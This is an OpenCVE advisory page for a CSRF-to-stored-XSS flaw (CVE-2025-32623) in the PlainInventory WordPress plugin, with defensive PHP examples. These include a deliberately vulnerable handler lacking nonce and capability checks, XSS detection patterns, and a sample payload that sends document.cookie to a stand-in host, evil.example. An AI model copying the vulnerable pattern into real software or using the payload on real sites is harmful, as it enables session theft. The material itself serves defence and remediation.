Description
Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory z-inventory-manager allows Stored XSS. This issue affects PlainInventory: from n/a through <= 3.1.9.
Published: 2025-04-09
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

A Cross-Site Request Forgery flaw in the PlainInventory WordPress plugin lets an attacker make a logged-in user's browser submit a state-changing request that the user never intended: the plugin accepts the request without checking that it originated from its own form (no valid anti-CSRF token, in WordPress terms no verified nonce). The submitted content is stored without adequate sanitization and later rendered without output encoding, so script embedded in it executes in the browser of any user who views the affected page. The CSRF is the entry point; the lasting damage is the stored XSS.

Affected Systems

The vulnerability is present in Plainware’s PlainInventory plugin for WordPress, affecting all releases up to and including version 3.1.9. Users and site administrators running these versions should verify their installation and consider upgrading to a patched release if available.

Risk and Exploitability

The CVSS 3.1 base score of 7.1 (High) follows from the vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L: the attack is launched remotely with low complexity, the attacker needs no privileges of their own, but a logged-in user must be lured into interacting (UI:R), and the scope is changed because the injected script runs in other users' browsers rather than only in the plugin. The EPSS score of less than 1% indicates a low predicted likelihood of exploitation in the wild, and the flaw is not listed in the CISA KEV catalog. Exploitation of a CSRF weakness of this kind consists of getting an authenticated user to load a crafted URL or an attacker-controlled page that auto-submits the forged request with the user's session cookies; once the plugin has stored the attacker's payload, it affects every subsequent user who views the stored content, whether or not they were involved in the original forged request.
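The pattern behind this class of bug, shown as an added example rather than PlainInventory's own code: a WordPress admin form handler that saves a field without a nonce or capability check and echoes it back raw, next to a hardened handler that verifies a nonce, checks a capability, sanitizes on input and escapes on output. The hook names (vuln_save_note, safe_save_note), option names and the manage_options capability are hypothetical and chosen for illustration only.

```php
<?php
// Added example (not PlainInventory's code): CSRF -> stored XSS pattern in a
// WordPress plugin, and the hardened equivalent. Hook/option names are hypothetical.

// --- Vulnerable pattern -------------------------------------------------------
// admin_post_* hooks fire for any logged-in user. Three things are missing here:
// 1. No nonce check: a page the user visits elsewhere can auto-submit a POST to
//    admin-post.php and the browser attaches the user's WordPress cookies (CSRF).
// 2. No capability check: any authenticated role can overwrite the option.
// 3. Raw storage and raw output: whatever was posted is echoed back as HTML.
add_action('admin_post_vuln_save_note', function () {
    update_option('vuln_inventory_note', wp_unslash($_POST['note'] ?? ''));
    wp_safe_redirect(admin_url('admin.php?page=vuln-inventory'));
    exit;
});

function vuln_render_note() {
    // Stored XSS: a saved "<script>...</script>" runs for every viewer of this page.
    echo '<div class="note">' . get_option('vuln_inventory_note', '') . '</div>';
}

// --- Hardened pattern ---------------------------------------------------------
function safe_render_form() {
    echo '<form method="post" action="' . esc_url(admin_url('admin-post.php')) . '">';
    echo '<input type="hidden" name="action" value="safe_save_note">';
    // Per-user, time-limited token; a cross-site page cannot read or guess it.
    wp_nonce_field('safe_save_note', '_safe_note_nonce');
    echo '<input type="text" name="note" value="'
        . esc_attr(get_option('safe_inventory_note', '')) . '">';
    submit_button('Save');
    echo '</form>';
}

add_action('admin_post_safe_save_note', function () {
    // Dies with 403 if the nonce is missing or invalid: defeats the forged request.
    check_admin_referer('safe_save_note', '_safe_note_nonce');

    // Authorization is separate from CSRF protection; require a real capability.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions', 403);
    }

    // Sanitize on input: strips tags, encoded characters and line breaks.
    $note = sanitize_text_field(wp_unslash($_POST['note'] ?? ''));
    update_option('safe_inventory_note', $note);
    wp_safe_redirect(admin_url('admin.php?page=safe-inventory'));
    exit;
});

function safe_render_note() {
    // Escape on output as well; input sanitization alone is not a substitute,
    // because the same value may be rendered in other contexts later.
    echo '<div class="note">' . esc_html(get_option('safe_inventory_note', '')) . '</div>';
}
```

The nonce check is what closes the CSRF (CWE-352); the capability check, input sanitization and output escaping are independent controls, and a fix that adds only the nonce still leaves a privileged user able to store script deliberately. Both halves need WordPress loaded (they are plugin code, not a stand-alone script).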

Generated by OpenCVE AI on May 1, 2026 at 10:56 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade PlainInventory to a release newer than 3.1.9 as soon as the vendor publishes one that removes the CSRF flaw; at the time this page was generated no vendor fix is recorded, so check the plugin's changelog before assuming a newer version is patched.
  • If an upgrade is not immediately possible, disable or remove the plugin from the site to eliminate the attack surface while a patch is applied.
  • Conduct a database audit to identify and delete any stored scripts that were injected via the vulnerability, and ensure that user‑submitted content is properly sanitized.
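One way to carry out the database audit in the last recommendation, as an added example that is not OpenCVE's or the plugin's code: a stand-alone PHP scan over exported rows that flags values carrying markup commonly used for stored XSS. It checks the raw value, its HTML-entity-decoded and URL-decoded forms, and the strings inside PHP-serialized arrays, since WordPress plugins routinely store settings that way. The sample rows are constructed for the example; the table and column names are illustrative, and in a real audit you would feed it wp_posts.post_content, wp_options.option_value and the plugin's own tables.

```php
<?php
// Added example (not OpenCVE's or the plugin's code): triage scan of exported
// WordPress rows for stored-XSS markup. Sample rows below are constructed.

const XSS_PATTERNS = [
    'script_tag'    => '/<\s*script\b/i',
    // Inline event handlers such as onerror=, onload=, onmouseover=.
    'event_handler' => '/\bon[a-z]+\s*=\s*["\'`]?/i',
    'js_uri'        => '/\b(?:href|src|action|formaction)\s*=\s*["\']?\s*javascript:/i',
    'active_embed'  => '/<\s*(?:iframe|object|embed|svg|math)\b/i',
    'data_html'     => '/data:\s*text\/html/i',
];

/**
 * Variants of a stored value that a renderer might end up emitting: raw,
 * entity-decoded, URL-decoded, and the leaf strings of a serialized array.
 * Entity-encoded script is harmless if emitted as-is, but is flagged because
 * some render paths decode before printing; treat hits as triage, not proof.
 */
function decode_variants(string $value): array {
    $variants = [$value];
    $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    if ($decoded !== $value) {
        $variants[] = $decoded;
    }
    $urldec = rawurldecode($value);
    if ($urldec !== $value) {
        $variants[] = $urldec;
    }
    // allowed_classes => false: never instantiate objects from untrusted data.
    $unser = @unserialize($value, ['allowed_classes' => false]);
    if (is_array($unser)) {
        array_walk_recursive($unser, function ($leaf) use (&$variants) {
            if (is_string($leaf)) {
                $variants[] = $leaf;
            }
        });
    }
    return $variants;
}

/** Rows whose value (in any variant) matches a pattern, tagged with the pattern name. */
function find_suspicious_rows(array $rows): array {
    $hits = [];
    foreach ($rows as $row) {
        foreach (decode_variants($row['value']) as $candidate) {
            foreach (XSS_PATTERNS as $name => $re) {
                if (preg_match($re, $candidate)) {
                    $hits[] = ['table' => $row['table'], 'id' => $row['id'], 'pattern' => $name];
                    continue 3; // one hit per row is enough for triage
                }
            }
        }
    }
    return $hits;
}

// Constructed sample rows (not real data): one clean option, one event-handler
// payload, one entity-encoded script, one payload inside a serialized array,
// and one harmless link.
$rows = [
    ['table' => 'wp_options', 'id' => 101, 'value' => 'Warehouse A'],
    ['table' => 'wp_options', 'id' => 102,
     'value' => '<img src=x onerror="fetch(\'//evil.example/\'+document.cookie)">'],
    ['table' => 'wp_posts',   'id' => 7,   'value' => '&lt;script&gt;alert(1)&lt;/script&gt;'],
    ['table' => 'wp_posts',   'id' => 8,
     'value' => 'a:1:{s:4:"name";s:27:"<svg onload=alert(1)></svg>";}'],
    ['table' => 'wp_posts',   'id' => 9,   'value' => '<a href="https://example.org/">ok</a>'],
];

foreach (find_suspicious_rows($rows) as $hit) {
    printf("%s#%d matched %s\n", $hit['table'], $hit['id'], $hit['pattern']);
}
```

Run against real exports, expect false positives from legitimate embeds (oEmbed iframes, SVG icons) and from plain text containing "on ... =", and review each hit before deleting anything; the point is to shortlist rows for a human, not to auto-clean. After removing injected content, rotate sessions for users who may have viewed it, since a stored XSS payload may already have exfiltrated cookies or created additional accounts.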

Advisories

Source: EUVD
ID: EUVD-2025-10580
Title: Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory allows Stored XSS. This issue affects PlainInventory: from n/a through 3.1.9.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type: Metrics
Values added: cvssV3_1 {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type: Description
Values removed: Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory allows Stored XSS. This issue affects PlainInventory: from n/a through 3.1.9.
Values added: Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory z-inventory-manager allows Stored XSS.This issue affects PlainInventory: from n/a through <= 3.1.9.

Type: References

Type: Metrics
Values added: cvssV3_1 {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 09 Apr 2025 16:30:00 +0000

Type: Description
Values added: Cross-Site Request Forgery (CSRF) vulnerability in plainware PlainInventory allows Stored XSS. This issue affects PlainInventory: from n/a through 3.1.9.

Type: Title
Values added: WordPress PlainInventory plugin <= 3.1.9 - CSRF to Stored XSS vulnerability

Type: Weaknesses
Values added: CWE-352

Type: References

Type: Metrics
Values added: cvssV3_1 {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

MITRE

Status: PUBLISHED

Assigner: Patchstack

Updated: 2026-04-28T16:12:25.731Z

Reserved: 2025-04-09T11:20:43.115Z

Link: CVE-2025-32623

Vulnrichment

No data.

NVD

Status: Deferred

Published: 2025-04-09T17:15:49.000

Modified: 2026-06-17T09:12:19.020

Link: CVE-2025-32623

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-05-01T11:00:15Z

Weaknesses
  • CWE-352

    Cross-Site Request Forgery (CSRF)